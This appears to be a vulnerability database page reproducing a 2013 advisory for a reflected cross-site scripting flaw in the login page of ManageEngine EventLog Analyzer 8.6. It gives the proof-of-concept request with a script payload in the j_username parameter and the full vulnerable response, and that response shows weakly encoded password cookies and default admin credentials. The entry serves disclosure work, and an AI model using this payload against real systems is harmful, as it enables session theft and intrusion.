Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

ManageEngine EventLog Analyzer "j_username"跨站脚本漏洞

🗓️ 22 Jan 2014 00:00:00Reported by RootType 
seebug
 seebug🔗 www.seebug.org👁 16 Views

ManageEngine EventLog Analyzer 8.6 XSS Vulnerabilit

Code

                                                ================================================================================================================================================================
 
                    ManageEngine EventLog Analyzer 8.6  cross-site scripting (XSS) Vulnerability
================================================================================================================================================================
 

#Date- 12/12/2013

# code by Asheesh kumar Mani Tripathi
 
     
 
# Credit by Asheesh Anaconda
 
 
 
#Vulnerbility
  ManageEngine EventLog Analyzer 8.6   is prone to an cross-site scripting (XSS) Vulnerability because the application fails to properly 
sanitize user-supplied input 
 
#Impact
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities 
 
 
========================================================================================================================
 
                                                           Request
========================================================================================================================


GET /event/j_security_check?forChecking=null&j_username=aad307"><script>alert(1)</script>509283f38eba1c193&j_password=a&domains=Choose&loginButton=Login&optionValue=hide HTTP/1.1
Host: 172.28.154.78:8400
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://172.28.154.78:8400/event/index3.do
Cookie: panelState=expanded; calselection=custom; tooltipDiv=block; JSESSIONID=946D162CF15C188883BA1750E38F7A7B
Connection: keep-alive


========================================================================================================================
 
                                                           Response 
========================================================================================================================
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
isLoginPage: true
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 17 Dec 2013 19:36:08 GMT
Content-Length: 17880



<link href="styles/newTheme.css" rel="stylesheet" type="text/css" />
<!-- link href="styles/calendar.css" rel="stylesheet" type="text/css"-->
<script type="text/javascript" language="JavaScript" src="javascript/sacommon.js"></script>
<script type="text/javascript" language="JavaScript" src="javascript/jquery-1.3.2.js"></script>
<script type="text/javascript" language="JavaScript" src="javascript/jquery-utils.js"></script>
<script type="text/javascript" language="JavaScript" src="javascript/jquery.cookie.js"></script>
<script type="text/javascript" language="JavaScript" src="javascript/jquery-ui.js" ></script>
<script type="text/javascript" language="JavaScript" src="javascript/elascript.js"></script>
<script type="text/javascript" language="JavaScript" src="javascript/setLayerPosition.js"></script>
<script type="text/javascript" language="JavaScript" src="javascript/LAUtils.js"></script>
<script type="text/javascript" language="JavaScript" src="javascript/json2.js"></script>
<script type="text/javascript" language="JavaScript" src="javascript/jstorage.js"></script>





<!DOCTYPE html>  
<html>
<head>

<title>ManageEngine EventLog Analyzer 8</title>
<LINK REL="SHORTCUT ICON" HREF="images/favicon.ico">
<script>


function userType(ADAuthEnabled)
{
  if(ADAuthEnabled == 'true')
  {
    //document.getElementById('loginOption').style.display='';
    document.getElementById('domainLists').style.visibility="visible";
    document.getElementById('selectdomiain').style.visibility="visible";
  } else {
    document.loginForm.domain.disabled=true;
  }
  //loadLogin();
  var id = document.getElementById("loginFirst");

  
                eval("id.style.visibility = 'visible';");
  
  
}

var xmlHttp;

function clearLoginInfo()
{
    xmlHttp=GetXmlHttpObject()
    if (xmlHttp==null)
    {
        alert ("Browser does not support HTTP Request")
        return
    } 
    var url="login.do?requestid=false"//No I18N
    url=url+"&sid="+Math.random()//No I18N
    xmlHttp.onreadystatechange=processReqChange 
    xmlHttp.open("GET",url,true)
    xmlHttp.send(null)
} 

function processReqChange() 
{
  // only if xmlHttp shows "complete"
    if (xmlHttp.readyState == 4) 
    {
       // only if "OK"
  if (xmlHttp.status == 200) 
        {
    var value = xmlHttp.responseText;
    var id = document.getElementById("loginFirst");
                eval("id.style.visibility = 'hidden';");
        } 
        else 
        {
          alert("There was a problem retrieving the data:\n" + xmlHttp.statusText);//No I18N
        }
    }
}    

function dynamicprocessReqChange() 
{
  // only if xmlHttp shows "complete"
    if (xmlHttp.readyState == 4) 
    {
       // only if "OK"
  if (xmlHttp.status == 200) 
        {
    var value = xmlHttp.responseText;
    if(value != null){
      populatedomains(value);
      
    }
        } 
        else 
        {
          alert("There was a problem retrieving the data:\n" + xmlHttp.statusText);//No I18N
        }
    }
}

function populatedomains(domainslist)
{
  var domainsforthisuser = domainslist.split(",");
  var numberofdomains = domainsforthisuser.length;
  document.loginForm.domains.options.length = 0;
  for(var i=0;i<numberofdomains;i++)
  {
    document.forms["loginForm"].domains.options[i] =new Option(domainsforthisuser[i],domainsforthisuser[i]);
  }
  authenticationType();
}


function GetXmlHttpObject()
{ 
    var objXMLHttp=null
    if (window.XMLHttpRequest)   //For browser compatibility - Mozilla,FF
    {
        objXMLHttp=new XMLHttpRequest()
    }
    else if (window.ActiveXObject)  //For browser compatibility - IE
    {
        objXMLHttp=new ActiveXObject("Microsoft.XMLHTTP")
    }
    return objXMLHttp
}

function dynamicDomains(usernameObject )
{
    var username = usernameObject.value;
    xmlHttp=GetXmlHttpObject()
    if (xmlHttp==null)
    {
        alert ("Browser does not support HTTP Request")
        return
    } 
    var url="/domainAuth?username="+username//No I18N
    xmlHttp.onreadystatechange=dynamicprocessReqChange 
    xmlHttp.open("GET",url,true)
    xmlHttp.send(null);
}

function loadLogin()
{
  //alert("loadLogin()")
   document.loginForm.j_username.value="";
    //document.login.j_username.focus();    
    init = (document.cookie).indexOf("username");        
    if(init != -1 )
    {
        //alert("inside getCookie.init");
        userlen = "username".length;        //No I18N
        beginIndex = ((document.cookie).indexOf("username")+userlen);        
        endIndex = (document.cookie).indexOf(";",beginIndex);
    if(endIndex == -1)
    {
      endIndex = (document.cookie).length;
    }
        username=(document.cookie).substring(beginIndex+1,endIndex);
        //alert("user:"+username);
        
        startIndex = ((document.cookie).indexOf("password")+"password".length);//No I18N
        endInd = (document.cookie).indexOf(";",startIndex); 
        if(endInd == -1)
        {
            endInd=(document.cookie).length;
        }
        //Decrypting encrypted password..
        var encPassword=(document.cookie).substring(startIndex+1,endInd);
    password = decryptPassword(encPassword);
        //alert(password);
        
        var ssoStart = ((document.cookie).indexOf("singlesignon")+"singlesignon".length);//No I18N
        var ssoEnd = (document.cookie).indexOf(";",ssoStart);
        if(ssoEnd == -1)
        {
            ssoEnd=(document.cookie).length;
        }
        var singlesignon = (document.cookie).substring(ssoStart+1,ssoEnd);
        //alert(singlesignon);
        
        document.loginForm.j_username.value=username;
        document.loginForm.j_password.value=password;
        document.loginForm.checkbox.checked=false;
  
   //alert(username + password+singlesignon);
        if(singlesignon=="true" && username!="" && password!="")
        {
            //alert('1');
            document.loginForm.checkbox.checked=true;
      //debugger;
            if(document.loginForm.forChecking.value!="Invalid loginName/password")
      {
                     document.loginForm.forChecking.value="";
         if ("null" == 'null')
         {   
         document.loginForm.submit();
         }
             }
             else
              {
                     document.loginForm.j_username.value="";
                     document.loginForm.j_password.value="";
                     document.loginForm.checkbox.checked=false;        
                     document.loginForm.j_username.focus();
               }
        }
        
    }
    else
    {
        //alert('0');                           
          document.loginForm.j_username.focus();
    }
}

function encryptPassword(textPassword) 
{
  var num_out = "";
  var str_in = escape(textPassword);
  for(i = 0; i < str_in.length; i++) 
  {
    num_out += str_in.charCodeAt(i) - 23;
  }
  return num_out;    
}

function decryptPassword(encPassword) 
{
  var str_out = "";
  var num_out = encPassword;  
  for(i = 0; i < num_out.length; i += 2) 
  {
    num_in = parseInt(num_out.substr(i,[2])) + 23;
    num_in = unescape('%' + num_in.toString(16));
    str_out += num_in;
  }
  var textPassword = unescape(str_out);
  return textPassword ;
}
function authenticationType()
{
var seldomain = document.loginForm.domains.value;

    if(seldomain.trim() == 'Local Authentication' || seldomain.trim() == 'Choose') 
    {
    
    if(seldomain.trim() == 'Choose' && jQuery('#domainLists').css('visibility') == 'visible'){  
      
      document.loginForm.AUTHRULE_NAME.value='ADAuthenticator'; //No I18N
    
      document.loginForm.domainName.disabled=false;
    
      document.loginForm.domainName.value=seldomain;
    
      document.loginForm.domain.disabled=false;
    
      document.loginForm.domain.value=seldomain;
    }
    else
    {
      
      document.loginForm.domain.disabled=true;
      document.loginForm.AUTHRULE_NAME.disabled=true; //No I18N
      document.loginForm.domainName.disabled=true;
    }
    }
          else if(seldomain=='radius') 
    {
    document.loginForm.AUTHRULE_NAME.value='RadiusAuthenticator'; //No I18N
    document.loginForm.domain.disabled=false;
    document.loginForm.domain.value=seldomain;
    }
    else
    {
    document.loginForm.AUTHRULE_NAME.value='ADAuthenticator'; //No I18N
    document.loginForm.domainName.disabled=false;
    document.loginForm.domainName.value=seldomain;
    document.loginForm.domain.disabled=false;
    document.loginForm.domain.value=seldomain;  
    }
    

}
function loginOptions()
{
  var optionValue = document.loginForm.optionValue.value;

  if(optionValue == 'show')
  {
    document.getElementById('domainLists').style.visibility='visible';
    document.getElementById('selectdomiain').style.visibility='visible';
    //document.getElementById('loginOption').innerHTML="<a title='Hide' href='javascript:loginOptions()'>Options <<</a>";
    document.loginForm.optionValue.value='hide';//No I18N
  }
  else
  {
    document.getElementById('domainLists').style.visibility='hidden';
    document.getElementById('selectdomiain').style.visibility='hidden';
    //document.getElementById('loginOption').innerHTML="<a title='Show' href='javascript:loginOptions()'>Options >></a>";
    document.loginForm.optionValue.value='show';//No I18N
  }
}

jQuery(document).ready(function() {
    
  var isIE = jQuery.browser.msie;
    if(isIE)
    {
      jQuery('.placeholderUsername').show();
      jQuery('.placeholderPassword').show();

      jQuery('#username').keypress(function(){
        if(jQuery(this).val() == '' || jQuery(this).val() == 'Password')
        {
          jQuery('.placeholderPassword').hide();
          jQuery('.placeholderUsername').hide();
                
        }
      });
      jQuery('#username').click(function(){
        jQuery('.placeholderUsername').hide();
        jQuery('.placeholderPassword').hide();
      });
      jQuery('#username').focus(function(){
            jQuery('.placeholderUsername').hide();
      });
      jQuery('#password').focus(function(){
          jQuery('.placeholderPassword').hide();
      }); 
      jQuery('.placeholderUsername').click(function(){
        jQuery(this).hide();
        jQuery('#username').focus();
      });
      jQuery('.placeholderPassword').click(function(){
        jQuery(this).hide();
        jQuery('#password').focus();
      });
      jQuery('#username').blur(function(){
        if(jQuery(this).val() == '')
        {
          jQuery('.placeholderUsername').show();
        }
        if(jQuery('#password').val() == '')
        {
          jQuery('.placeholderPassword').show();
        }
        else
        {
          jQuery('.placeholderPassword').hide();
        }
      });
      jQuery('#password').blur(function(){
        if(jQuery(this).val() == '')
        {
          jQuery('.placeholderPassword').show();
        }
        if(jQuery('#username').val() == '')
        {
          jQuery('.placeholderUsername').show();
        }

      });  
    }
    
});


</script>
</head>


<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0" onload="userType('false');" style="background-color:#FFF" scroll="yes" >
<script language="JavaScript" type="text/JavaScript">
function check()
{
  x = document.loginForm
  if (x.j_username.value == "" || x.j_username.value =="User Name")
  {
    document.getElementById('message').innerHTML ='Please enter a User Name';
    return false;
  }

  if ( x.j_password.value == "" ||  x.j_password.value =="Password")
  {
    document.getElementById('message').innerHTML ='Please enter password';
    return false;
  }
  //Convert the username to lowercase to overcome the login issue in mickey
  x.j_username.value=x.j_username.value.toLowerCase();

  
  // this is for 'Keep me signed on'
  var expDate = new Date();
  var thisCookie;  
  if(x.checkbox.checked)
  {  
    expDate.setTime(expDate.getTime()+(24*60*60*1000*365));
    document.cookie="username= "+x.j_username.value+";expires= "+((expDate).toGMTString());
    //Encrypting the password for Cookie
    var textPassword = x.j_password.value ;
    var encPassword = encryptPassword(textPassword);
    document.cookie="password= "+ encPassword +";expires= "+((expDate).toGMTString());
        var sso = "true";
        document.cookie="singlesignon= "+ sso +";expires= "+((expDate).toGMTString());
  //alert("cookie:"+document.cookie);
        //console.debug("cockie="+document.cookie);
  }
  else
  {   
    expDate.setTime(expDate.getTime());
    document.cookie="username= "+x.j_username.value+";expires= "+((expDate).toGMTString());       
    document.cookie="password= "+x.j_password.value+";expires= "+((expDate).toGMTString());
          document.cookie="singlesignon= 'false';expires= "+((expDate).toGMTString());
    //alert("else cookie:"+document.cookie);
        
  }
  
}





</script>
<form name="loginForm" action="j_security_check" method="post" onSubmit="return check()" >
  
  <input type="hidden" name="AUTHRULE_NAME" value="Authenticator">
     
     <input type="hidden" name="domainName" disabled value="Local">
  
<div id="loginmain">

    <div id="login">
  <div class="loginmessage">
    <h1>Sign In here</h1>
    <div id="message" class="error2"></div>

      
       <input type="hidden" name="forChecking" value="No such account configured for the user [aad307"><script>alert(1)</script>509283f38eba1c193]">
       
       <SCRIPT LANGUAGE="javascript" type="text/javascript">
         document.getElementById('message').innerHTML ='Invalid loginname / password';
        
      </SCRIPT>
            

      
      
      </div>  
      <div class="loginbox">
        <div class="login_input1"> <span class="usericon"> </span>
           <div class="placeholderUsername">User Name</div>
          <input type="text" tabindex="10" name="j_username" id="username"  onchange='dynamicDomains(this)' class="txtbox2" placeholder="User Name" />
     
  </div>
    <div class="login_input"> <span class="passicon"> </span>
    <div class="placeholderPassword">Password</div>
        <input type="password" tabindex="20" name="j_password" id="password" class="txtbox2" placeholder="Password" />
        
          
        </div>
</div> 
     
      <div id="selectdomiain" style="visibility:hidden"> 
      <div id="domainLists" style="visibility:hidden">  
    
       <select name="domains" onChange='authenticationType()'>
         <option value="Choose">--  Choose  --</option>
         
        <option value="Local Authentication">Local Authentication</option>
      </select>
      <input name="domain" type="hidden" value="">
  </div></div>

  <div class="btn">
    
    <div class="remember">
            <input type="checkbox" name="checkbox" id="checkbox" />
        <label class="txt">Keep me signed in</label>
</div>
    <div class="login_bnt">    
        <input name="loginButton" type="submit" style="width:80" class="loginbtn" value="Login" onclick="authenticationType()">
  <input name="optionValue" type="hidden" value="hide">
   </div>
</div>
<div id="loginFirst" class="alignC" style="top:300px; position:absolute;width:400px;">
<span id="firstTimeInfo" class="firstTimeMgs">First time users use '<b>admin</b>' / '<b>admin</b>' to login   <a title="Do not show login details again" onclick="clearLoginInfo()" href="javascript:void(0);">X</a> </span> 
</div>
    </div> 
    
  <div id="login_log">
    <div id="logobg">
        <div id="logo"><img src="images/eventlog_login_logo.png" alt="EventLog Analyzer" /></div>
      <div class="loginCaption">Unlock the Real Value of your Machine Generated Logs</div>
    </div>
  </div>
 
</div>
<div id="copyright">The <a href="http://www.eventloganalyzer.com" target="_blank">SIEM software</a> from <a href="http://www.manageengine.com" target="_blank" title="www.manageengine.com">ManageEngine </a> © 2013 <a href="http://www.manageengine.com" target="_blank" title="www.manageengine.com">ZOHO Corp.</a> All Rights Reserved </div>



  

         

  <script>
  loadLogin();
  </script>
   

</form>

<map name="Map">
    <area shape="rect" coords="2,2,141,37"    href="http://www.netflowanalyzer.com" target="_blank" title="http://www.netflowanalyzer.com">
    <area shape="rect" coords="149,3,289,38"  href="http://www.desktopcentral.com" target="_blank" title="http://www.desktopcentral.com">
    <area shape="rect" coords="296,3,437,38"  href="http://www.fwanalyzer.com" target="_blank" title="http://www.fwanalyzer.com">
    <area shape="rect" coords="442,2,582,36"  href="http://www.opmanager.com" target="_blank" title="http://www.opmanager.com">
    <area shape="rect" coords="589,2,736,36"  href="http://www.wifimanager.com" target="_blank" title="http://www.wifimanager.com">
    <area shape="rect" coords="460,42,515,54" href="https://store.manageengine.com" target="_blank" title="https://store.manageengine.com">
</map>
</body>

</html>


<script language="JavaScript">
function getieversion()
{
    var ua = window.navigator.userAgent
    var msie = ua.indexOf ( "MSIE " )
    if ( msie > 0 ) {return parseInt ( ua.substring ( msie+5, ua.indexOf ( ".", msie ) ) );}
    else {return 6 ;}  //tmp kludge to resolve other browsers
}
</script>

<script>

if(getieversion()<=5 )
{
    document.loginForm.j_username.disabled = true;
    document.loginForm.j_password.disabled = true;
    document.loginForm.loginButton.disabled = true;

    document.loginForm.j_username.className = "txtboxDisabled";
    document.loginForm.j_password.className = "txtboxDisabled";
    document.loginForm.loginButton.className= "txtboxDisabled";
    alert("Sorry, we do not Support your Internet Explorer version "+getieversion()+" !!!");//No I18N
}

var AcceptsCookiesCheck = false;

if(eval("document.cookie"))
{
  if(document.cookie == '')
  {
    document.cookie = 'AcceptsCookiesCheck=yes';
    if(document.cookie.indexOf('AcceptsCookiesCheck=yes') != -1)
    {
      AcceptsCookiesCheck = true;
    }
    else
    { 
      alert("Web Browser should have both Javascript and Cookies enabled!");
    }
  }
}
jQuery.cookie("panelState","expanded");//No I18N
jQuery.cookie("calselection","custom");//No I18N
jQuery.cookie("tooltipDiv","block");//No I18N
//added for search - Pravin
jQuery(document).ready(function()
{
  //this will remove all the keys which were saved by storage ...
  jQuery.jStorage.flush(); 
});
</script>

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
22 Jan 2014 00:00Current
7.1High risk
Vulners AI Score7.1
vulnerabilitycross-site scriptingmanageengine eventlog analyzerapplication securityuser input sanitationdata compromiseapache-coyote/1.1xss exploitsecurity risk
16